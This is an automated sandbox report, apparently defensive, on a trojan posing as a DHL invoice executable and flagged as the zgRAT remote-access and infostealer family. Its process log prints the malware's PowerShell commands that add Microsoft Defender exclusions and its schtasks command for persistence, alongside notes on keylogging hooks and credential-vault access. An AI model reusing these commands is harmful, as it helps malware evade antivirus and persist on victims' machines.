Delivery Invoice.exe, 00000009.00000002.4259345206.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4276985451.00000000062E3000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4282180177.000000000930E000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003469000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 
0000000E.00000002.4255566065.00000000012A9000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.000000000350E000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4289443671.000000000957D000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49737 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\DHL Delivery Invoice.exe
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe Window created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe Window created: window name: CLIPBRDWNDCLASS

                      System Summary

                      Source: 14.2.LIWBHGsz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.LIWBHGsz.exe.4909990.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.LIWBHGsz.exe.4909990.1.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.LIWBHGsz.exe.4b6ace8.4.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.LIWBHGsz.exe.4b6ace8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
                      Source: initial sample Static PE information: Filename: DHL Delivery Invoice.exe
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CEB28314_2_06CEB283
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE30E014_2_06CE30E0
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CEC1E814_2_06CEC1E8
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE76F814_2_06CE76F8
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE240814_2_06CE2408
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CEE40014_2_06CEE400
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE5D3B14_2_06CE5D3B
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE004014_2_06CE0040
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE000614_2_06CE0006
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002DFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedf8fc031-c024-49b7-9cf2-cdfecdf01d4a.exe4 vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1824455417.0000000000D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1843513866.00000000079A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedf8fc031-c024-49b7-9cf2-cdfecdf01d4a.exe4 vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1850359008.0000000009D70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1824455417.0000000000DB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000000.1788290888.0000000000796000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSLRd.exe, vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1828601395.0000000004318000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4255194280.00000000008F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exeBinary or memory string: OriginalFilenameSLRd.exe, vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 14.2.LIWBHGsz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.LIWBHGsz.exe.4909990.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.LIWBHGsz.exe.4909990.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.LIWBHGsz.exe.4b6ace8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.LIWBHGsz.exe.4b6ace8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: DHL Delivery Invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: LIWBHGsz.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.DHL Delivery Invoice.exe.4335828.4.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.DHL Delivery Invoice.exe.79a0000.5.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, nW3n9DtCUKVoFXJXYL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, nW3n9DtCUKVoFXJXYL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, nW3n9DtCUKVoFXJXYL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@2/2
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeFile created: C:\Users\user\AppData\Roaming\LIWBHGsz.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2520:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3328:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1508:120:WilError_03
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC314.tmpJump to behavior
                      Source: DHL Delivery Invoice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[adUsers] SET [samAccountName] = @samAccountName, [_dn] = @_dn, [phoneCorp] = @phoneCorp, [phoneMobile] = @phoneMobile, [IpPhone] = @IpPhone, [key_card] = @key_card WHERE (([id] = @Original_id) AND ([samAccountName] = @Original_samAccountName) AND ([_dn] = @Original__dn) AND ((@IsNull_phoneCorp = 1 AND [phoneCorp] IS NULL) OR ([phoneCorp] = @Original_phoneCorp)) AND ((@IsNull_phoneMobile = 1 AND [phoneMobile] IS NULL) OR ([phoneMobile] = @Original_phoneMobile)) AND ((@IsNull_IpPhone = 1 AND [IpPhone] IS NULL) OR ([IpPhone] = @Original_IpPhone)) AND ((@IsNull_key_card = 1 AND [key_card] IS NULL) OR ([key_card] = @Original_key_card)));
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[adUsers] ([samAccountName], [_dn], [phoneCorp], [phoneMobile], [IpPhone], [key_card]) VALUES (@samAccountName, @_dn, @phoneCorp, @phoneMobile, @IpPhone, @key_card);
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Employee_photo] SET [Id] = @Id, [SerialNumber] = @SerialNumber, [ePhoto] = @ePhoto, [ePath] = @ePath, [id_empl] = @id_empl WHERE (([id_photo] = @Original_id_photo) AND ([Id] = @Original_Id) AND ((@IsNull_SerialNumber = 1 AND [SerialNumber] IS NULL) OR ([SerialNumber] = @Original_SerialNumber)) AND ((@IsNull_ePath = 1 AND [ePath] IS NULL) OR ([ePath] = @Original_ePath)) AND ([id_empl] = @Original_id_empl));
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[Employee_photo] ([Id], [SerialNumber], [ePhoto], [ePath], [id_empl]) VALUES (@Id, @SerialNumber, @ePhoto, @ePath, @id_empl);
                      Source: DHL Delivery Invoice.exeReversingLabs: Detection: 52%
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeFile read: C:\Users\user\Desktop\DHL Delivery Invoice.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\DHL Delivery Invoice.exe "C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Users\user\Desktop\DHL Delivery Invoice.exe "C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Users\user\Desktop\DHL Delivery Invoice.exe "C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\LIWBHGsz.exe C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess created: C:\Users\user\AppData\Roaming\LIWBHGsz.exe "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: DHL Delivery Invoice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: DHL Delivery Invoice.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      Source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, id.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.DHL Delivery Invoice.exe.4335828.4.raw.unpack, id.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.DHL Delivery Invoice.exe.79a0000.5.raw.unpack, id.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, T4MYihU2jTbHZyP9hj.cs | .Net Code: HdPubs9aVL System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, T4MYihU2jTbHZyP9hj.cs | .Net Code: HdPubs9aVL System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, T4MYihU2jTbHZyP9hj.cs | .Net Code: HdPubs9aVL System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe | Code function: 9_2_00E8E762 push ds; ret 9_2_00E8E763
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe | Code function: 9_2_00E80C6D push edi; retf 9_2_00E80C7A
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe | Code function: 9_2_00E8AEDE push edx; ret 9_2_00E8AEE5
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe | Code function: 9_2_06627670 push esp; iretd 9_2_06627679
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe | Code function: 9_2_06627C24 push esp; iretd 9_2_06627C2D
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe | Code function: 10_2_07F61F40 pushad ; iretd 10_2_07F61F4D
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe | Code function: 10_2_086A3FC8 pushfd ; iretd 10_2_086A3FD6
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe | Code function: 10_2_086A40FC pushfd ; iretd 10_2_086A40FE
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe | Code function: 14_2_03090C6D push edi; retf 14_2_03090C7A
                      Source: DHL Delivery Invoice.exe | Static PE information: section name: .text entropy: 7.469334701221808
                      Source: LIWBHGsz.exe.0.dr | Static PE information: section name: .text entropy: 7.469334701221808
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, AhqLRAzDifvQitaSMY.csHigh entropy of concatenated method names: 'DCFCDWkHne', 'aXuCtm2uA0', 'syxCAUKMAw', 'nkHCl5SYBX', 'J5QCQIT6kv', 'kniCVfuZ7R', 'BgkCvf2jmp', 'C8NCH66Sd0', 'mpWC5t7OQe', 'uKEC4rx5Q4'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, KY302Gupdo3G84DdV4.csHigh entropy of concatenated method names: 'bXdY8W3n9D', 'sUKYUVoFXJ', 'ssLY6YVfId', 'jX6YddeoOi', 'bk2YGaJABo', 'YdSY9DPIU1', 'NILI6LxygqnmD3FF7L', 'Ywwe2RJBb2JYGBoSb6', 'eTBYYye0Wr', 'O7eYhisBv7'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, nW3n9DtCUKVoFXJXYL.csHigh entropy of concatenated method names: 'ItS0a5Vmaf', 'NM30wMKDOW', 'A3D0RdZ0pm', 'uxH0iEAGsA', 'UOZ014kgnD', 'rci0j7Cmp3', 'IPa0IoI4jD', 'jFl0LRRsru', 'sR90qOhksn', 'Pj80OInC4h'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, r10FOIq3RwJJSDBE6T.csHigh entropy of concatenated method names: 'HDpyloxufv', 'UXbyQr7Exk', 'uV9yKNI40X', 'ONcyVAUINA', 'DLoyv6KpFC', 'F6Gyk4HyUT', 'C7OycQvjwd', 'nNKyT9JaaA', 'JY0yfaoaSS', 'qQOyF5ZlyA'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, ak9TLTYYo3XPXTuLLCn.csHigh entropy of concatenated method names: 'xNYCOKTpuf', 'zvTCz9VAKk', 'TQMr2AXJ8U', 'CV9rYJ2GvD', 'afqrNn5Qxd', 'tI8rhCSCmE', 'pl5ruDHxHN', 'uB7roHWyaD', 'Jo6rWOwvyI', 'GNBr0HYXa1'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, zYIKPrYuoh0gmw1dmks.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tRLgyXWa0d', 'lGfgCRuOBk', 'lxwgrgl0Cw', 'XJvggt3EmU', 'sH8gSFkv16', 'kxVgs4W9Be', 'hcjgHVdmaL'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, aQHQCCAsLYVfId8X6d.csHigh entropy of concatenated method names: 'svN3pGU1xV', 'GZH3Dwkw0K', 'Yi73tbOLXZ', 'MMe3AyhHyN', 'a383GIXmrL', 'afr39fbhNy', 'jJb3nU6p31', 'wrs37kjo6t', 'd7H3yCIgCQ', 'k943CsXx3f'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, raUZwtankETy9DHvxq.csHigh entropy of concatenated method names: 'XhrGFsC4wL', 'vBAGmH8YWu', 'Qw6Ga2sDav', 'FA6GwG9cYM', 'GpXGQ1PsPR', 'BMRGKj6HGB', 'qypGVSmjYs', 'U58GvNaKnO', 'P2pGkpsslL', 'NvrGcR2npg'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, blCDnlN5aw2LgftDY2.csHigh entropy of concatenated method names: 'sjJbBFGs7', 'rj4pypSxr', 'rZeDQ77cn', 'rAMB9sUrE', 'A30ARZ4u7', 'UYEXSrS17', 'uXkQ7dI4E8cViZ1ScI', 'ihfvoSTDHhvJljB0Kq', 'J9n7EOqgG', 'd7YC6W9DO'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, OoOiy3XUylJnXYk2aJ.csHigh entropy of concatenated method names: 'JrpxEY5y53', 'WThxBSXAvl', 'PyG3KdQNVv', 'XEg3VvcDXO', 'Ytc3vGQcCN', 'BmD3kkobU2', 'jdk3c2xSEf', 'u3F3T0CwYf', 'Ltw3flFFZk', 'Duc3Fl4i46'
